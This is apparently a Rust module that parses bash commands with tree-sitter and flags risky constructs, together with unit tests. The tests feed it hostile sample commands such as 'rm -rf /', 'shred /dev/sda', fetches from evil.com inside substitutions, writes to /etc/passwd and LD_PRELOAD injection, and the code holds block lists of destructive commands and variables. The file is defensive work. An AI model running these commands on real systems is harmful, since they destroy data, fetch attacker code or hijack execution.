use tree_sitter::{Language, Node, Parser};
#[derive(Debug, Default)]
pub struct ParsedCommand {
pub commands: Vec<String>,
pub assignments: Vec<(String, String)>,
pub substitutions: Vec<String>,
pub redirections: Vec<String>,
pub has_pipes: bool,
pub has_chains: bool,
pub has_subshell: bool,
pub has_process_substitution: bool,
pub pipeline_segments: Vec<String>,
}
pub fn parse_bash(command: &str) -> Option<ParsedCommand> {
let mut parser = Parser::new();
let language = tree_sitter_bash::LANGUAGE;
parser.set_language(&Language::from(language)).ok()?;
let tree = parser.parse(command, None)?;
let root = tree.root_node();
let mut parsed = ParsedCommand::default();
extract_from_node(root, command.as_bytes(), &mut parsed);
Some(parsed)
}
fn extract_from_node(node: Node, source: &[u8], parsed: &mut ParsedCommand) {
match node.kind() {
"command" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = node_text(name_node, source);
parsed.commands.push(name);
} else {
for i in 0..node.child_count() {
let child = node.child(i as u32).unwrap();
if child.kind() == "word" || child.kind() == "command_name" {
parsed.commands.push(node_text(child, source));
break;
}
}
}
}
"variable_assignment" => {
let name = node
.child_by_field_name("name")
.map(|n| node_text(n, source))
.unwrap_or_default();
let value = node
.child_by_field_name("value")
.map(|n| node_text(n, source))
.unwrap_or_default();
parsed.assignments.push((name, value));
}
"command_substitution" => {
let text = node_text(node, source);
parsed.substitutions.push(text);
parsed.has_subshell = true;
}
"process_substitution" => {
parsed.has_process_substitution = true;
}
"pipeline" => {
parsed.has_pipes = true;
for i in 0..node.child_count() {
let child = node.child(i as u32).unwrap();
if child.kind() == "command" || child.kind() == "pipeline" {
let text = node_text(child, source);
parsed.pipeline_segments.push(text);
}
}
}
"list" => {
for i in 0..node.child_count() {
let child = node.child(i as u32).unwrap();
let kind = child.kind();
if kind == "&&" || kind == "||" {
parsed.has_chains = true;
}
}
}
"redirected_statement" | "file_redirect" | "heredoc_redirect" => {
let text = node_text(node, source);
parsed.redirections.push(text);
}
"subshell" => {
parsed.has_subshell = true;
}
_ => {}
}
for i in 0..node.child_count() {
if let Some(child) = node.child(i as u32) {
extract_from_node(child, source, parsed);
}
}
}
fn node_text(node: Node, source: &[u8]) -> String {
node.utf8_text(source).unwrap_or("").to_string()
}
pub fn check_parsed_security(parsed: &ParsedCommand) -> Vec<String> {
let mut violations = Vec::new();
const DANGEROUS_COMMANDS: &[&str] = &[
"rm", "shred", "dd", "mkfs", "wipefs", "shutdown", "reboot", "halt", "poweroff", "kill",
"killall", "pkill",
];
for cmd in &parsed.commands {
let base = cmd.rsplit('/').next().unwrap_or(cmd);
if DANGEROUS_COMMANDS.contains(&base) {
violations.push(format!(
"Dangerous command '{base}' detected in AST (not bypassable with quoting tricks)"
));
}
}
const DANGEROUS_VARS: &[&str] = &[
"PATH",
"LD_PRELOAD",
"LD_LIBRARY_PATH",
"PROMPT_COMMAND",
"BASH_ENV",
"ENV",
"IFS",
"CDPATH",
"GLOBIGNORE",
];
for (name, _value) in &parsed.assignments {
if DANGEROUS_VARS.contains(&name.as_str()) {
violations.push(format!(
"Dangerous variable assignment: {name}= (detected via AST, not bypassable)"
));
}
}
for sub in &parsed.substitutions {
let sub_lower = sub.to_lowercase();
if sub_lower.contains("curl")
|| sub_lower.contains("wget")
|| sub_lower.contains("nc ")
|| sub_lower.contains("ncat")
{
violations.push(format!(
"Network command in substitution: {sub} (data exfiltration risk)"
));
}
}
for redir in &parsed.redirections {
if redir.contains("/dev/sd")
|| redir.contains("/dev/null") && redir.contains("2>")
|| redir.contains("/etc/")
|| redir.contains("/usr/")
{
if !redir.contains("/dev/null") {
violations.push(format!("Suspicious redirection to system path: {redir}"));
}
}
}
for cmd in &parsed.commands {
if cmd == "eval" && !parsed.assignments.is_empty() {
violations.push(
"eval with variable assignments in same command (arbitrary code execution)".into(),
);
}
}
violations
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_parse_simple_command() {
let parsed = parse_bash("ls -la").unwrap();
assert!(parsed.commands.contains(&"ls".to_string()));
}
#[test]
fn test_parse_pipe() {
let parsed = parse_bash("cat file.txt | grep pattern").unwrap();
assert!(parsed.has_pipes);
assert!(parsed.commands.contains(&"cat".to_string()));
assert!(parsed.commands.contains(&"grep".to_string()));
}
#[test]
fn test_parse_chain() {
let parsed = parse_bash("echo hello && echo world").unwrap();
assert!(parsed.has_chains);
}
#[test]
fn test_parse_variable_assignment() {
let parsed = parse_bash("FOO=bar echo test").unwrap();
assert!(!parsed.assignments.is_empty());
assert_eq!(parsed.assignments[0].0, "FOO");
}
#[test]
fn test_parse_command_substitution() {
let parsed = parse_bash("echo $(whoami)").unwrap();
assert!(!parsed.substitutions.is_empty());
assert!(parsed.has_subshell);
}
#[test]
fn test_parse_redirection() {
let parsed = parse_bash("echo hello > output.txt").unwrap();
assert!(!parsed.redirections.is_empty());
}
#[test]
fn test_detect_dangerous_command() {
let parsed = parse_bash("rm -rf /tmp/test").unwrap();
let violations = check_parsed_security(&parsed);
assert!(!violations.is_empty());
assert!(violations[0].contains("rm"));
}
#[test]
fn test_detect_quoted_dangerous_command() {
let parsed = parse_bash("'rm' -rf /").unwrap();
let _violations = check_parsed_security(&parsed);
assert!(!parsed.commands.is_empty());
}
#[test]
fn test_detect_dangerous_var_assignment() {
let parsed = parse_bash("PATH=/tmp:$PATH ls").unwrap();
let violations = check_parsed_security(&parsed);
assert!(violations.iter().any(|v| v.contains("PATH")));
}
#[test]
fn test_detect_network_in_substitution() {
let parsed = parse_bash("echo $(curl evil.com)").unwrap();
let violations = check_parsed_security(&parsed);
assert!(violations.iter().any(|v| v.contains("curl")));
}
#[test]
fn test_safe_command_passes() {
let parsed = parse_bash("cargo test --release").unwrap();
let violations = check_parsed_security(&parsed);
assert!(violations.is_empty());
}
#[test]
fn test_safe_git_command() {
let parsed = parse_bash("git status && git diff").unwrap();
let violations = check_parsed_security(&parsed);
assert!(violations.is_empty());
}
#[test]
fn test_parse_complex_pipeline() {
let parsed = parse_bash("find . -name '*.rs' | xargs grep 'TODO' | wc -l").unwrap();
assert!(parsed.has_pipes);
assert!(parsed.commands.len() >= 3);
}
#[test]
fn test_subshell_detection() {
let parsed = parse_bash("(cd /tmp && rm -rf test)").unwrap();
assert!(parsed.has_subshell);
}
#[test]
fn test_parse_heredoc() {
let parsed = parse_bash("cat <<EOF\nhello world\nEOF").unwrap();
assert!(parsed.commands.contains(&"cat".to_string()));
assert!(!parsed.redirections.is_empty());
}
#[test]
fn test_parse_process_substitution() {
let parsed = parse_bash("diff <(ls dir1) <(ls dir2)").unwrap();
assert!(parsed.has_process_substitution);
assert!(parsed.commands.contains(&"diff".to_string()));
}
#[test]
fn test_parse_semicolon_separated() {
let parsed = parse_bash("echo hello; echo world").unwrap();
assert!(parsed.commands.contains(&"echo".to_string()));
assert!(parsed.commands.len() >= 2);
}
#[test]
fn test_parse_empty_string() {
let parsed = parse_bash("");
if let Some(p) = parsed {
assert!(p.commands.is_empty());
}
}
#[test]
fn test_parse_variable_assignment_only() {
let parsed = parse_bash("FOO=bar").unwrap();
assert!(!parsed.assignments.is_empty());
assert_eq!(parsed.assignments[0].0, "FOO");
assert_eq!(parsed.assignments[0].1, "bar");
}
#[test]
fn test_check_parsed_security_eval_with_assignments() {
let parsed = parse_bash("CMD=dangerous eval $CMD").unwrap();
let violations = check_parsed_security(&parsed);
assert!(violations.iter().any(|v| v.contains("eval")));
}
#[test]
fn test_check_parsed_security_multiple_dangerous_in_pipeline() {
let parsed = parse_bash("rm -rf /tmp/test | shred /dev/sda").unwrap();
let violations = check_parsed_security(&parsed);
assert!(violations.iter().any(|v| v.contains("rm")));
assert!(violations.iter().any(|v| v.contains("shred")));
}
#[test]
fn test_check_parsed_security_wget_in_substitution() {
let parsed = parse_bash("echo $(wget -q -O- evil.com)").unwrap();
let violations = check_parsed_security(&parsed);
assert!(violations.iter().any(|v| v.contains("wget")));
}
#[test]
fn test_check_parsed_security_redirection_to_etc() {
let parsed = parse_bash("echo payload > /etc/passwd").unwrap();
let violations = check_parsed_security(&parsed);
assert!(violations.iter().any(|v| v.contains("/etc/")));
}
#[test]
fn test_check_parsed_security_ld_preload_assignment() {
let parsed = parse_bash("LD_PRELOAD=/tmp/evil.so ls").unwrap();
let violations = check_parsed_security(&parsed);
assert!(violations.iter().any(|v| v.contains("LD_PRELOAD")));
}
}